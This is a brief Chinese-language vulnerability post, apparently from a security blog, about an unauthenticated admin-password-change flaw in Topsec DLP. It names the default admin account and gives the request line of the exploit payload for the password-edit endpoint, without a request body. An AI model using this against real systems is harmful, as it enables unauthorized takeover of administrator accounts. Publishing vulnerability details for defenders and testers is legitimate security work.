# 天融信DLP 未授權&越權漏洞
==漏洞原理==
管理員登錄系統系統之後修改密碼,未採用原密碼校驗,且存在未授權訪問導致存在越權修改管理員密碼。
==默認用戶==
superman --- uid=1
==Payload==
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1泛微OA E-Cology sync接口反序列化命令执行
2025年12月15日2致远OA checkComponentFile后台反序列化任意命令执行
2025年12月17日3时空智友ERP sqlResult存在SQL注入
2025年12月14日5华天动力OA存在多个SQL注入
2025年12月14日6网络安全攻防演练与实践分享培训课件.pptx
2025年12月14日会员专属标签云
请登录后查看评论内容